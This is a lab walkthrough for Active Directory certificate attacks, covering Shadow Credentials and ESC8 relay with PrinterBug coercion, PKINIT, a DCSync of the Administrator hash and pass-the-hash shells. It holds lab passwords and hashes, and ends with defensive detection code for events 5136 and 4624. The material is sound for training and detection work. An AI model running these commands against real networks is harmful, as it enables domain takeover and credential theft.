# Questions

## Pass the Certificate — Questions

Use this page as the quick walkthrough for the lab question.

### Q1 — Read `flag.txt` from `jpinkman`'s Desktop

**Path used:** Shadow Credentials

#### Step 1 — Install `pywhisker`

```bash
cd /home/Tools
git clone https://github.com/ShutdownRepo/pywhisker.git
cd pywhisker
pip3 install -r requirements.txt --break-system-packages
```

#### Step 2 — Add a key credential to `jpinkman`

```bash
cd ~
python3 /home/Tools/pywhisker/pywhisker/pywhisker.py --dc-ip 10.129.234.174 -d INLANEFREIGHT.LOCAL -u wwhite -p 'package5shores_topher1' --target jpinkman --action add
```

Save the generated `.pfx` filename and password from the output.

#### Step 3 — Install `PKINITtools`

```bash
cd /home/Tools
git clone https://github.com/dirkjanm/PKINITtools.git
cd PKINITtools
pip3 install -r requirements.txt --break-system-packages
```

#### Step 4 — Request a TGT as `jpinkman`

```bash
python3 /home/Tools/PKINITtools/gettgtpkinit.py -cert-pfx ~/lGCwAhQt.pfx -pfx-pass 'zAht39guDjCwxqOzlly7' -dc-ip 10.129.234.174 INLANEFREIGHT.LOCAL/jpinkman /tmp/jpinkman.ccache
```

#### Step 5 — Configure Kerberos resolution

Add the DC to `/etc/hosts`:

```bash
echo '10.129.234.174  dc01.inlanefreight.local' | sudo tee -a /etc/hosts
```

Update `/etc/krb5.conf`:

```ini
[libdefaults]
    default_realm = INLANEFREIGHT.LOCAL

[realms]
    INLANEFREIGHT.LOCAL = {
        kdc = dc01.inlanefreight.local
    }

[domain_realm]
    .inlanefreight.local = INLANEFREIGHT.LOCAL
    inlanefreight.local = INLANEFREIGHT.LOCAL
```

#### Step 6 — Load the ticket and connect

```bash
export KRB5CCNAME=/tmp/jpinkman.ccache
evil-winrm -i dc01.inlanefreight.local -r inlanefreight.local
```

#### Step 7 — Read the flag

```powershell
cd Desktop
cat flag.txt
```

**Flag:** `3d7e3dfb56b200ef715cfc300f07f3f8`

### Q2 — ESC8 → PtC → DCSync → Administrator shell

**Goal:** Get `flag.txt` from Administrator's desktop.

#### Attack chain

```
Setup Impacket + ntlmrelayx listener
        ↓
Coerce DC01$ to authenticate back to the attacker
        ↓
Relay to `/certsrv` and request a certificate for DC01$
        ↓
Decode the returned PFX
        ↓
Request a TGT as DC01$ with PKINIT
        ↓
DCSync the Administrator NT hash
        ↓
Pass the hash with Evil-WinRM
        ↓
Read `flag.txt`
```

***

#### Step 1 — Setup Impacket

```bash
cd ~/Tools
git clone https://github.com/fortra/impacket.git
cd impacket
python3 setup.py install
```

> Install from the repo directly. Some distro packages miss scripts like `ntlmrelayx.py`.

***

#### Step 2 — Start the NTLM relay listener

```bash
wget https://github.com/fortra/impacket/raw/refs/heads/master/examples/ntlmrelayx.py
python3 ntlmrelayx.py -t http://10.129.226.35/certsrv/certfnsh.asp --adcs --smb2support --template KerberosAuthentication
```

| Flag                                | Purpose                                      |
| ----------------------------------- | -------------------------------------------- |
| `-t`                                | Relay target — the AD CS enrollment endpoint |
| `--adcs`                            | Enable AD CS relay mode                      |
| `--smb2support`                     | Accept SMB2 connections                      |
| `--template KerberosAuthentication` | Request a cert usable for PKINIT             |

> Keep this running. Use a second terminal for the next step.

***

#### Step 3 — Coerce DC01 authentication with PrinterBug

```bash
wget https://github.com/dirkjanm/krbrelayx/raw/refs/heads/master/printerbug.py
python3 printerbug.py INLANEFREIGHT.LOCAL/wwhite:"package5shores_topher1"@10.129.47.245 10.10.16.41
```

This calls `MS-RPRN RpcRemoteFindFirstPrinterChangeNotification` on DC01. That forces DC01$ to authenticate back to the attacker. The relay listener then forwards that request to AD CS and receives a certificate for DC01$.

**Expected `ntlmrelayx` output:**

```
[*] Authenticating against http://.../certsrv as INLANEFREIGHT/DC01$ SUCCEED
[*] GOT CERTIFICATE! ID 8
[*] Writing PKCS#12 certificate to ./DC01$.pfx
```

The returned PFX content is Base64-encoded.

***

#### Step 4 — Decode the certificate

```bash
# Paste the Base64 string into a file
echo "<BASE64_STRING>" > DC01$.pfx

# Decode it into a binary PFX
base64 -d DC01$.pfx > DC01-decoded.pfx
```

***

#### Step 5 — Setup PKINITtools

```bash
cd ~/Tools
git clone https://github.com/dirkjanm/PKINITtools.git
pip3 install -r ~/Tools/PKINITtools/requirements.txt
```

***

#### Step 6 — Request a TGT as DC01$

```bash
python3 ~/Tools/PKINITtools/gettgtpkinit.py \
  -cert-pfx ./DC01-decoded.pfx \
  -dc-ip 10.129.47.245 \
  'inlanefreight.local/dc01$' \
  dc.ccache
```

| Flag                        | Purpose                        |
| --------------------------- | ------------------------------ |
| `-cert-pfx`                 | Path to the decoded binary PFX |
| `-dc-ip`                    | Domain controller IP           |
| `inlanefreight.local/dc01$` | Machine account principal      |

> This saves the Kerberos ticket to `dc.ccache`.

***

#### Step 7 — DCSync as DC01$

```bash
export KRB5CCNAME=./dc.ccache
impacket-secretsdump -k -no-pass \
  -dc-ip 10.129.47.245 \
  -just-dc-user Administrator \
  'INLANEFREIGHT.LOCAL/DC01$'@DC01.INLANEFREIGHT.LOCAL
```

| Flag                          | Purpose                             |
| ----------------------------- | ----------------------------------- |
| `-k`                          | Use Kerberos auth from `KRB5CCNAME` |
| `-no-pass`                    | Skip the password prompt            |
| `-just-dc-user Administrator` | Dump only the Administrator account |

> This works because `DC01$` has DCSync rights by default.

**If it fails, fix DNS resolution in `/etc/hosts`:**

```bash
sudo nano /etc/hosts
```

Add:

```
10.129.47.245   DC01.INLANEFREIGHT.LOCAL
```

Then run `secretsdump` again.

**Expected output:**

```
Administrator:500:aad3b435b51404eeaad3b435b51404ee:fd02e525dd676fd8ca04e200d265f20c:::
```

***

#### Step 8 — Pass the hash with Evil-WinRM

```bash
evil-winrm -u Administrator -i 10.129.47.245 -H fd02e525dd676fd8ca04e200d265f20c
```

***

#### Step 9 — Read the flag

```powershell
cd ..\Desktop
type flag.txt
```

***

#### All commands

```bash
# Setup
cd ~/Tools
git clone https://github.com/fortra/impacket.git
cd impacket
python3 setup.py install

# Relay listener
wget https://github.com/fortra/impacket/raw/refs/heads/master/examples/ntlmrelayx.py
python3 ntlmrelayx.py -t http://<CA_IP>/certsrv/certfnsh.asp --adcs --smb2support --template KerberosAuthentication

# Coerce DC01
wget https://github.com/dirkjanm/krbrelayx/raw/refs/heads/master/printerbug.py
python3 printerbug.py DOMAIN/user:"pass"@<DC_IP> <ATTACKER_IP>

# Decode certificate
echo "<BASE64>" > DC01$.pfx
base64 -d DC01$.pfx > DC01-decoded.pfx

# PKINITtools
cd ~/Tools
git clone https://github.com/dirkjanm/PKINITtools.git
pip3 install -r ~/Tools/PKINITtools/requirements.txt

# Get TGT
python3 ~/Tools/PKINITtools/gettgtpkinit.py -cert-pfx ./DC01-decoded.pfx -dc-ip <DC_IP> 'domain/dc01$' dc.ccache

# DCSync
export KRB5CCNAME=./dc.ccache
impacket-secretsdump -k -no-pass -dc-ip <DC_IP> -just-dc-user Administrator 'DOMAIN/DC01$'@DC01.DOMAIN

# Shell
evil-winrm -u Administrator -i <DC_IP> -H <NT_HASH>

# Flag
cd ..\Desktop
type flag.txt
```
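As an added defender-side example (not part of the original walkthrough), the following Python triage flags the two telemetry traces these paths leave: a foreign write to `msDS-KeyCredentialLink` (Q1, Security event 5136) and a machine-account NTLM network logon from an address that is not the host's own (Q2, event 4624 on the relay target). The event records and host inventory are constructed samples that reuse the IPs and account names shown on this page; `KNOWN_HOSTS`, `SAMPLE_EVENTS` and both rule functions are assumptions of this example.

```python
"""Added defender-side triage (not from the walkthrough): flags the traces the two
paths on this page leave in Windows Security logs, over constructed sample events."""

# Constructed inventory: the address each domain computer is expected to use.
KNOWN_HOSTS = {"DC01$": "10.129.47.245"}

# Constructed records shaped like Security events 5136 and 4624 (fields trimmed).
SAMPLE_EVENTS = [
    {"EventID": 5136, "SubjectUserName": "wwhite",
     "ObjectDN": "CN=jpinkman,CN=Users,DC=inlanefreight,DC=local",
     "AttributeLDAPDisplayName": "msDS-KeyCredentialLink"},
    {"EventID": 5136, "SubjectUserName": "WS01$",
     "ObjectDN": "CN=WS01,CN=Computers,DC=inlanefreight,DC=local",
     "AttributeLDAPDisplayName": "msDS-KeyCredentialLink"},
    {"EventID": 4624, "TargetUserName": "DC01$", "LogonType": "3",
     "AuthenticationPackageName": "NTLM", "IpAddress": "10.10.16.41"},
    {"EventID": 4624, "TargetUserName": "DC01$", "LogonType": "3",
     "AuthenticationPackageName": "Kerberos", "IpAddress": "10.129.47.245"},
]

def _cn(dn):
    # First RDN value: 'jpinkman' from 'CN=jpinkman,CN=Users,...'
    return dn.split(",", 1)[0].removeprefix("CN=")

def shadow_credential_writes(events):
    """Q1 trace: msDS-KeyCredentialLink written by an account other than the object
    itself. Self-writes (WS01$ on CN=WS01) are normal device registration."""
    hits = []
    for e in events:
        if (e.get("EventID") == 5136
                and e.get("AttributeLDAPDisplayName") == "msDS-KeyCredentialLink"
                and e["SubjectUserName"].rstrip("$").lower() != _cn(e["ObjectDN"]).lower()):
            hits.append((e["SubjectUserName"], _cn(e["ObjectDN"])))
    return hits

def relayed_machine_logons(events, known_hosts=KNOWN_HOSTS):
    """Q2 trace: network (type 3) NTLM logon for a machine account from an address
    that is not the host's own; on the CA web server that is the relayed DC01$."""
    hits = []
    for e in events:
        if e.get("EventID") != 4624 or e.get("LogonType") != "3":
            continue
        acct = e["TargetUserName"]
        if not acct.endswith("$") or e.get("AuthenticationPackageName") != "NTLM":
            continue
        expected = known_hosts.get(acct)
        if expected and e["IpAddress"] != expected:
            hits.append((acct, e["IpAddress"], expected))
    return hits
```

Both rules are cheap to run over exported 5136/4624 records; the first needs auditing of directory object changes enabled on the DCs, the second a host-to-address inventory to compare against.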

